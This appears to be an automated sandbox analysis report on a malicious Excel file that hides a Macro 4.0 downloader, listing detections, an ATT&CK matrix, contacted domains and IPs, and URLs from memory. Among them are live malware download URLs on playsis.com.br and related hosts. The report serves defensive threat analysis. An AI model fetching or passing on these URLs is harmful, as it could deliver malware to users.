      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: EXCEL.EXE, 00000001.00000003.527724456.0000000013706000.00000004.00000001.sdmpBinary or memory string: Saving imgs.htm. Press ESC to cancel.ESC to cancel.3}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ee,b
      Source: EXCEL.EXE, 00000001.00000003.461834280.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475951004.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.489769065.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610656942.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488673925.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467737108.000000000FD88000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.608003887.000000000E024000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Yara detected hidden Macro 4.0 in ExcelShow sources
      Source: Yara matchFile source: counter-1248368226.xls, type: SAMPLE
      Source: Yara matchFile source: C:\Users\user\Desktop\counter-1248368226.xls, type: DROPPED
      Source: EXCEL.EXE, 00000001.00000002.605169444.0000000003690000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: EXCEL.EXE, 00000001.00000002.605169444.0000000003690000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: EXCEL.EXE, 00000001.00000002.605169444.0000000003690000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: EXCEL.EXE, 00000001.00000002.605169444.0000000003690000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsCommand and Scripting Interpreter2DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution23Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      counter-1248368226.xls41%ReversingLabsDocument-Excel.Downloader.EncDoc

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      SourceDetectionScannerLabelLink
      greenflag.esp.br1%VirustotalBrowse
      playsis.com.br1%VirustotalBrowse
      noithat117.vn3%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      https://cdn.entity.0%URL Reputationsafe
      https://playsis.com0%Avira URL Cloudsafe
      https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
      https://webshell.suite.office.comeH0%Avira URL Cloudsafe
      https://www.odwebp.svc.msomP0%Avira URL Cloudsafe
      http://schemas.open0%URL Reputationsafe
      https://api.aadrm.com/0%URL Reputationsafe
      https://greenflag.esp.br/yuINdRbM/tiynh.htmlZd0%Avira URL Cloudsafe
      https://api.office.netyp(0%Avira URL Cloudsafe
      https://playsis.com.br/qJSL1BN5V/tiynh.html100%Avira URL Cloudmalware
      https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
      https://officeci.azurewebsites.net/api/0%URL Reputationsafe
      https://store.office.cn/addinstemplate0%URL Reputationsafe
      https://playsis.com.br/100%Avira URL Cloudmalware
      https://www.odwebp.svc.ms0%URL Reputationsafe
      https://playsis.com.br/R100%Avira URL Cloudmalware
      https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
      https://substrate.office.como0%Avira URL Cloudsafe
      https://greenflag.esp.br/z0%Avira URL Cloudsafe
      https://cortana.aiIY0%Avira URL Cloudsafe
      https://api.onedrive.comMBI0%Avira URL Cloudsafe
      https://api.diagnostics.office.comhuc0%Avira URL Cloudsafe
      https://greenflag.esp.br/yuINdRbM/tiynh.html0%Avira URL Cloudsafe
      https://ncus.contentsync.0%URL Reputationsafe
      https://substrate.office.comR0%Avira URL Cloudsafe
      https://substrate.office.comP0%Avira URL Cloudsafe
      https://playsis.com.br/qJSL1BNs100%Avira URL Cloudmalware
      https://wus2.contentsync.0%URL Reputationsafe
      https://onedrive.live.comed0%Avira URL Cloudsafe
      https://api.office.net=sl0%Avira URL Cloudsafe
      https://substrate.office.com4:0%Avira URL Cloudsafe
      https://dataservice.o365filtering.comUV0%Avira URL Cloudsafe
      https://playsis.com.br/qJSL1BN5V/tiynh.htmlvn/TSh7GBeIR/tiynh.html100%Avira URL Cloudmalware
      https://api.office.netls0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      greenflag.esp.br
      		108.179.192.98
      		truefalseunknown
      playsis.com.br
      		162.241.2.78
      		truefalseunknown
      noithat117.vn
      		103.28.36.171
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://playsis.com.br/qJSL1BN5V/tiynh.htmltrue
      • Avira URL Cloud: malware
      		unknown
      https://greenflag.esp.br/yuINdRbM/tiynh.htmlfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      https://shell.suite.office.com:1443EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
        		high
        https://autodiscover-s.outlook.com/EXCEL.EXE, 00000001.00000003.488654985.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.475934601.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467719465.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461793870.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.489721327.000000000FD75000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610610633.000000000FD75000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
          		high
          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
            		high
            https://cdn.entity.3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
            • URL Reputation: safe
            		unknown
            https://insertmedia.bing.office.net/odc/insertmediaqEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
              		high
              https://playsis.comEXCEL.EXE, 00000001.00000003.462703099.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.612583630.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418614920.00000000167D2000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.324846454.00000000167D3000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                		high
                https://rpsticket.partnerservices.getmicrosoftkey.com3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                • URL Reputation: safe
                		unknown
                https://lookup.onenote.com/lookup/geolocation/v13638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                  		high
                  https://webshell.suite.office.comeHEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://www.odwebp.svc.msomPEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://schemas.openEXCEL.EXE, 00000001.00000003.469607881.0000000016ABE000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.470048142.000000001690E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455964384.0000000016B06000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455940301.0000000016AD6000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://clients.config.office.net/https://logucEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmpfalse
                    		high
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                      		high
                      https://login.windows.net/common/oauth2/authorizea_EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                        		high
                        https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                          		high
                          https://api.aadrm.com/EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                          • URL Reputation: safe
                          		unknown
                          https://greenflag.esp.br/yuINdRbM/tiynh.htmlZdEXCEL.EXE, 00000001.00000003.324828323.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418599518.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419668761.00000000167C6000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.office.netyp(EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                            		high
                            https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXEfalse
                              		high
                              https://api.microsoftstream.com/api/EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                		high
                                https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                  		high
                                  https://cr.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                    		high
                                    https://login.windows.net/common/oauth2/authorizesZEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BinguoEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                        		high
                                        https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        https://tasks.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                          		high
                                          https://api.office.net/sEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                            		high
                                            https://officeci.azurewebsites.net/api/EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://graph.ppe.windows.net//EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                              		high
                                              https://store.office.cn/addinstemplateEXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://login.windows.net/common/oauth2/authorize&EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                		high
                                                https://login.windows.net/common/oauth2/authorize?SEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://api.diagnostics.office.com?VEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://onedrive.live.com/embed?iEXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                        		high
                                                        https://playsis.com.br/EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmptrue
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://www.odwebp.svc.msEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://login.windows.net/common/oauth2/authorizeOPEXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://api.powerbi.com/v1.0/myorg/groupsEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                            		high
                                                            https://playsis.com.br/REXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmptrue
                                                            • Avira URL Cloud: malware
                                                            		unknown
                                                            https://web.microsoftstream.com/video/EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                              		high
                                                              https://api.addins.store.officeppe.com/addinstemplateEXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                              • URL Reputation: safe
                                                              		unknown
                                                              https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlWEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://substrate.office.comoEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://greenflag.esp.br/zEXCEL.EXE, 00000001.00000003.526779002.00000000136A7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611442721.00000000136D7000.00000004.00000001.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://graph.windows.netEXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drfalse
                                                                  		high
                                                                  https://api.microsoftstream.com/api/nt9HEXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpfalse
                                                                    		high
